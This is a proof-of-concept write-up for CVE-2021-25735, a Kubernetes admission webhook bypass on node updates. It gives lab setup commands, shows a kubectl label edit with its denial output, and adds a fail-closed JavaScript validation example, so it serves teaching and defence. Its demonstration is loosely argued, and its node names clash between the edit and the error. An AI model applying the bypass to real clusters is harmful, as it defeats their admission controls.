
CVE-2021-25735 PoC — Validating Admission Webhook does not observe some previous fields

Associated Vulnerability
Title: Validating Admission Webhook does not observe some previous fields (CVE-2021-25735)
Description: A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields.
Description: Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass
Readme
# CVE-2021-25735
## Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

### Set the Vulnerable Environment

Start by running the script gencerts.sh, which generates the TLS certificate and key the webhook serves with. \
`bash gencerts.sh`

To deploy the admission controller, build the container image locally, then tag it and push it to your Docker Hub repository with the commands below (`darryk/dev` is the author's repository; use your own).\
`docker login` \
`docker build -t validationwebhook:1.0 .` \
`docker tag validationwebhook:1.0 darryk/dev:1.0` \
`docker push darryk/dev:1.0`

Now deploy the image containing the Node.js webhook application into your Kubernetes cluster. webhook-deploy.yaml creates all the components the webhook needs. \
`kubectl apply -f webhook-deploy.yaml`

Next, register the webhook with the Kubernetes API server. To do that, base64-encode the ca.crt generated earlier and put the result in place of CA_BUNDLE inside webhook-registration.yaml (the output is kept on a single line so it pastes cleanly into the YAML). \
`base64 < ca.crt | tr -d '\n'`

Finally, apply the registration so the API server starts calling the webhook. \
`kubectl apply -f webhook-registration.yaml`


### Exploit CVE-2021-25735

Edit the node with `kubectl edit nodes` and add the following labels.\
`kubectl edit nodes ip-172-20-61-82.ec2.internal`

```yaml
  labels:
    test: test
    changeAllowed: "false"
```

Because changeAllowed is set to "false", the webhook denies the update and kubectl reports:
> error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed
> You can run `kubectl replace -f /tmp/kubectl-edit-irc64.yaml` to try this update again.

If we retry the edit with changeAllowed set to "true" instead:\
```yaml
  labels:
    test: test
    changeAllowed: "true"
```

This time the edit is accepted, bypassing the admission controller.
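The check such a webhook has to get right, shown as an added example in JavaScript (not the project's server.js): a validation function for Node UPDATE requests that denies when the node's previous labels carried changeAllowed: "false" and, because a vulnerable apiserver may supply an oldObject that does not reflect those previous fields, fails closed when the old state it depends on is absent. The rule, the label name, the response messages and the sample request are assumptions made for illustration.

```javascript
// Added example (not the project's server.js): decision logic for a validating
// webhook on Node UPDATE requests whose rule depends on the node's previous
// state. Rule assumed for illustration: deny any update to a node whose OLD
// labels carried changeAllowed: "false". Because a vulnerable kube-apiserver
// (CVE-2021-25735) may hand the webhook an oldObject that does not reflect
// such previous fields, the handler fails closed when that state is missing.

function labelsOf(obj) {
  return (obj && obj.metadata && obj.metadata.labels) || null;
}

// Builds the AdmissionReview response for one request.
function validate(review) {
  const req = (review && review.request) || {};
  const respond = (allowed, message) => ({
    apiVersion: 'admission.k8s.io/v1',
    kind: 'AdmissionReview',
    response: { uid: req.uid, allowed, ...(message ? { status: { message } } : {}) },
  });
  // The old-state rule applies only to Node updates; everything else passes.
  if (!req.kind || req.kind.kind !== 'Node' || req.operation !== 'UPDATE') {
    return respond(true);
  }
  const oldLabels = labelsOf(req.oldObject);
  if (oldLabels === null) {
    // Fail closed: the previous state this rule depends on was not observed.
    return respond(false, 'Validation failed: previous node state not observed');
  }
  if (oldLabels.changeAllowed === 'false') {
    return respond(false, 'Validation failed: node is frozen (changeAllowed="false")');
  }
  return respond(true);
}

// Constructed sample AdmissionReview in the shape kube-apiserver sends;
// pass null as oldLabels to simulate an oldObject carrying no labels.
function sampleReview(oldLabels, newLabels) {
  const node = (labels) => ({ apiVersion: 'v1', kind: 'Node',
    metadata: { name: 'node-a', ...(labels ? { labels } : {}) } });
  return {
    apiVersion: 'admission.k8s.io/v1',
    kind: 'AdmissionReview',
    request: { uid: 'constructed-uid-1', operation: 'UPDATE',
      kind: { group: '', version: 'v1', kind: 'Node' },
      oldObject: node(oldLabels), object: node(newLabels) },
  };
}
```

A webhook written this way denies the second edit in the walkthrough above as long as the old labels reach it, and still denies when they do not, instead of silently allowing the change.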
File Snapshot

[4.0K] /data/pocs/c56f6793de8506f85dec651ede1a6f8a82a07077
├── [4.0K] app
│   ├── [ 362] package.json
│   ├── [ 14K] package-lock.json
│   └── [1.4K] server.js
├── [  17] ca.srl
├── [ 233] Dockerfile
├── [ 494] gencerts.sh
├── [1.0K] LICENSE
├── [1.8K] README.md
├── [ 725] webhook-deploy.yaml
└── [1.8K] webhook-registration.yaml

1 directory, 10 files